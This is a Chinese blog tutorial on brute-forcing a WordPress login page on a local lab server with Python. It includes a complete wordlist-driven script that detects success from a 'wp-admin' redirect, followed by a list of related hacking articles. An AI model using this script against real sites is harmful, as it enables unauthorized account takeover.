Python黑客攻防(八)密码破解攻击

最新推荐文章于 2024-06-20 11:45:43 发布
最新推荐文章于 2024-06-20 11:45:43 发布
阅读量4.4k 收藏 61
点赞数 5
分类专栏: Python黑客编程 文章标签: python 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/107375856
版权

前言

进行黑客攻击通常需要做大量重复性工作。如果黑客直接通过浏览器攻击Web网站,就要不断手动修改输入值,并反复点击。但如果可以在应用程序内部访问Web网站并接收结果值,那么只需要使用简单的几行代码就能成功攻破目标网站。本篇文章讲解对网站的登入密码进行暴力破解。

准备

python环境

靶场->Python黑客攻防(四)搭建测试环境

教程

1.先开启靶场,浏览器输入http://127.0.0.1/wp-login.php,该页面可以输入用户名和密码,是我们的目标页面。
在这里插入图片描述
2.了解python是如何调用web页面的。见下方代码及分析。在这里插入图片描述


import urllib.request

url = " http://127.0.0.1/wp-login.php"
values = {'log': 'python', 'pwd': 'python1'}
headers = {'User-Agent': 'Mozilla/4.0(compatible;MIS 5.5; Windows NT)'}
data = urllib.parse.urlencode(values).encode(encoding='utf-8')
request = urllib.request.Request(url, data, headers)  #创建Request对象
response = urllib.request.urlopen(request) #调用Web页面使用Request对象返回结果值

print("#UTL:%s"%response.geturl())  # 输出URL
print("#CODE:%s"%response.getcode())  #输出状态码
print("#INFO:%s"%response.info())  
print("#DATA:%s"%response.read())

分析:

破解密码是我们的目的,这里我们假设已经知道用户名为python,键‘pwd’对应的值就是密码。这是我们要传送的值。我们先设置错误的密码,目的是查看返回给我们的数据。第五行headers是设置HTTP头值,第六行是将传送值设置为HTTP协议形式。第七行是创建Request对象,若只简单调用URL,放入URL参数即可。使用的是POST方法传递值或需要设置头部分值时,要分别将相应数据作为参数传入,运行结果见下图。
在这里插入图片描述3.由上图的错误密码运行结果可知返回的URL是我们原始的URL,现在我们也点鼠标右键查看源代码。在这里插入图片描述HTML源代码含有多种标记,其中,需要掌握用于接收用户输人并传递给Web服务器的标记与字段。首先,标记的action字段用于指定接收用户输人的页面。标记的name字段用于设置保存用户输人值的变量名。从HTML源代码可知,用户名保存于log变量,密码保存于pwd变量,然后传送给Web服务器。

现在我们尝试传入的是正确的密码,查看一下返回的数据。在这里插入图片描述在这里插入图片描述由上图可以看到返回的URL与上次的不同,并且URL中wp-admin可以很明显的区别于刚才的URL,这个我们后面可以利用。

4.我们用密码字典来进行暴破,密码字典是很关键的一部分,我们可以通过对网站的信息收集,然后在线生成密码字典,提高破解速度。也可以下载专门的字典文件,这里我们在线生成一个密码字典,如下图,输入信息生成密码,然后创建文本,将密码粘贴进去。在这里插入图片描述在这里插入图片描述5.python密码破解

# -*- coding: gbk -*-
import urllib.request

url = " http://127.0.0.1/wp-login.php"
user_login = "python"

wordlist = open(r"C:\Users\ASUS\Desktop\word.txt", "r",encoding='UTF-8')
passwords = wordlist.readlines()
for password in passwords:
    password = password.strip()
    values = {'log': user_login, 'pwd': password}
    data = urllib.parse.urlencode(values).encode(encoding='utf-8')
    request = urllib.request.Request(url, data)
    response = urllib.request.urlopen(request)


    try:
        idx = response.geturl().index('wp-admin')

    except:
        idx = 0

    if (idx>0):
        print("-"*10+"破解成功!密码为:"+password+"-"*10)
        break
    else:
        print("-"*10+"破解中.....正在尝试:"+password+"-"*10)

wordlist.close()

在这里插入图片描述这代码是在上一个代码的基础上添加了循环,读取字典及登录检测,登录检测就是第18行的对返回的URL进行是否包含管理页面地址的子字符串检测,以此来判断是否登录成功,现在运行代码,破解成功。在这里插入图片描述觉得不错可以关注微信公众号:黑客帮。

在这里插入图片描述

肥胖喵
关注
  • 5
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
chatgpt赋能pythonPython黑客教程:入门指南
m0_56069948的博客
07-01 371
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
黑客攻防-请看介绍
09-14
标题 "黑客攻防-请看介绍" 涉及到的是网络安全领域中的一个重要主题——黑客攻击与防御。在这个主题下,我们主要探讨四个关键的知识点: 1. **基础知识**:这是学习任何领域的基础,对于黑客攻防也不例外。基础知识...
零基础Python黑客工具入门
JAVAmonster12的博客
07-30 2546
为了满足新手对Python的追求,特写了三个初级Python入门工具。第一期写了三个初级工具,希望新手看完以后可以对Python的脚本有一个基本了解。一件套pythondrequests模块,构造一个whois信息收集器;二件套Python编写一个arp断网攻击;三件套目录信息收集。一件套前言带给想写项目但无从下手的朋友们,这些脚本都比较容易理解简单梳理一下此工具需要具备哪些功能。脚本获取信息如下IP信息子域名备案注册人邮箱地址电话DNS具体操作如下。...
黑客入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
xiangxueerfei的博客
09-22 1631
首先要明白啊,我们现在说的黑客不是那种窃取别人信息、攻击别人系统的黑客,说的是调试和分析计算机安全系统的网络安全工程师。黑客技术的核心就是渗透攻防技术,是为了证明网络防御按照预期计划正常运行而提供的一种机制。就是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。去一个地方就要学会人家的家乡话,不然就不知所云了。就好比:肉鸡是什么?
Python实现的黑客技术
wananxuexihu的博客
06-20 1045
近年来,网络安全领域频繁出现黑客攻击事件,成为备受关注的问题。然而,黑客技术并非神秘不可捉摸,任何人只要愿意学习,都能掌握一些基础的黑客技能。本文将介绍几种常见的黑客技术及其实现方法,以便让大家了解黑客技术的基本原理。同时,我们还会提供Python代码示例,以供读者实际操作练习。需要强调的是,本文旨在教育目的,强调合法合规,不鼓励任何违法行为。上述代码使用了Python的库进行并发编程,以加快端口扫描的速度。是Python标准库中的一个模块,用于支持多进程编程。
黑客攻防学习笔记 入门
Python栈
03-02 481
黑客的培养,需要很多来自外国的教程,所以他们一定英语很好,也懂网络安全基本术语,比如肉鸡,挂马和后门之类的,也得掌握ARP、TCPIP等正式的术语;端口可以理解成门,或者通道,当你需要一个服务时,要通过端口这个门,访问一个网页时,在浏览器输入一个地址,然后,这个地址被转换成IP地址,然后再访问相应服务器的端口后服务器返回给你想访问的页面, 我们访问网站,也就是通过的80端口,选定的端口用来提供相应的服务,常用的端口有,本章我们的关键词是:黑客,IP地址,端口,系统进程,黑客常用的DOS命令。
保姆级黑客入门教程《Python安全攻防:渗透测试实战指南》极致经典,学完即可入狱!
xiangxue666的博客
02-25 626
保姆级黑客入门教程《Python安全攻防:渗透测试实战指南》极致经典,学完即可入狱!
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
06-28
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
linux 基础黑客技术 攻防
03-19
网络信息安全 攻防技术指导 攻防linux 系统,linux系统基础 黑客技术知识
黑客防线攻防入门
11-07
随着信息技术的发展,信息安全,网络安全,电脑安全,这样的字眼走入我们的视野中,这是一本关于黑客的书,能帮助你了解黑客常见的入侵手段,能帮助你更好的防护你的电脑。。
black hat python + python 源码剖析
10-09
这本书主要讲解如何利用Python进行黑客技术与网络安全的工作,包括但不限于网络扫描、漏洞利用、密码学应用、自动化工具开发以及隐蔽通信等。这些内容可以帮助读者了解黑客攻击的原理,同时也能提升防御能力。例如,...
AHRID-黑客攻击画像分析系统.zip
12-11
笔者曾混迹过各种攻防演练活动,参与过防守方、攻击方,也算是大概了解了每一个队伍的任务~参加防守时印象尤为深刻,也跟一起防守的“战友”做过有趣的事情,例如:反打攻击队;题外话说的有点多了,来说说为什么...
利用Python做网络安全开发.zip
12-16
10. **蜜罐技术**:通过搭建Python蜜罐系统,如`Kytos`,可以监测并研究黑客攻击行为。 11. **网络安全数据可视化**:`matplotlib`、`seaborn`和`Gephi`等库可以将网络流量、威胁情报等数据转化为直观的图表,便于...
Python_一个攻防知识仓库 Red Teaming and Offensive Security.zip
05-24
Python在攻防领域,尤其是红队(Red Team)和攻击安全(Offensive Security)中扮演着重要角色。红队通常模拟黑客行为,对组织的安全防御进行测试,以找出潜在的漏洞和弱点。这个名为"Python_一个攻防知识仓库 Red...
Python网络安全项目开发实战_搭建Python防范环境_编程案例解析实例详解课程教程.pdf
04-27
黑客,在一般人的印象中都很神秘。他们在网络中攻无不克、战无不胜,似乎无所不能。实际上黑客并没有那么神通广大,黑客技术也没那么复杂,即使是一个网络小白,如果按照科学的方法也可以成为一名合格的黑客。下面就...
[小小明]Python正则表达式全套笔记v0.3(1.8万字干货).pdf
01-17
Python正则表达式是Python语言中的一个重要组成部分,用于处理文本数据的检索、匹配和操作。这份笔记由作者小小明编写,全面介绍了正则表达式的各个方面,包括基本概念、匹配规则、分组、断言,以及Python中正则...
如何成为一名黑客?Python灰帽子和黑帽子带你走进黑客世界
python03011的博客
06-15 2167
如何成为一名黑客?Python灰帽子和黑帽子带你走进黑客世界
黑客攻防实战,黑客入门到精通,收藏这一篇就够了
Javachichi的博客
12-06 2091
你知道在每天上网时,有多少黑客正在浏览我们计算机中的重要数据吗﹖黑客工具的肆意传播,使得即使是稍有点计算机基础的人,就可以使用简单的工具对网络中一些疏于防范的主机进行攻击,在入侵成功之后,对其中的数据信息为所欲为。当用户发现密码被盗、资料被修改或删除、硬盘变作一团空白时,再想亡羊补牢,却为时已晚。对于那些防范意识较差或对网络安全知识不甚了解的用户,常常极易成为黑客攻击的目标。因此,对于那些苦于收到网络安全迫害的读者,以及想入门网络安全的小伙伴,小编在这里给大家黑客攻防秘笈入门,需要本资料的,同时想要入坑黑客
【保姆级】黑客入门教程「Python安全攻防:渗透测试实战指南」经典纯狱风~
wangluo12138的博客
11-28 2028
在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。
python黑客攻防入门
最新发布
07-04
"Python 黑客攻防入门"通常指的是网络安全领域的学习资源,它旨在帮助读者理解如何使用Python这门语言来进行安全测试、漏洞分析和防御措施。以下是一些基本概念和内容概述: 1. **基础知识**:首先,你需要了解Python的基础语法,如变量、数据类型、控制流等,因为这些是攻防操作的基础。 2. **网络工具**:Python中有许多库,如Scapy(用于网络协议分析)、Nmap(网络扫描)和Metasploit(渗透测试框架),可以帮助你理解和实践网络攻击和防御。 3. **漏洞利用**:学习如何识别常见的软件漏洞(如SQL注入、跨站脚本等),并使用Python编写简单的exploits(利用代码)。 4. **道德黑客(Ethical Hacking)**:虽然名为“入门”,但它强调的是合法的安全评估,而不是恶意破坏。会讲解渗透测试许可证和合规性的重要性。 5. **防御技术**:包括防火墙设置、入侵检测系统(IDS/IPS)配置,以及Python在创建Web应用防护和日志分析中的应用。 6. **加密与解密**:了解基础的加密原理,并用Python处理常见的加密算法和密码学概念。 相关问题: 1. Python中哪些库常用于网络安全攻防? 2. 初学者应该如何平衡Python黑客攻防的学习和伦理准则? 3. 在实际工作中,Python黑客攻防的知识有哪些应用场景?
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值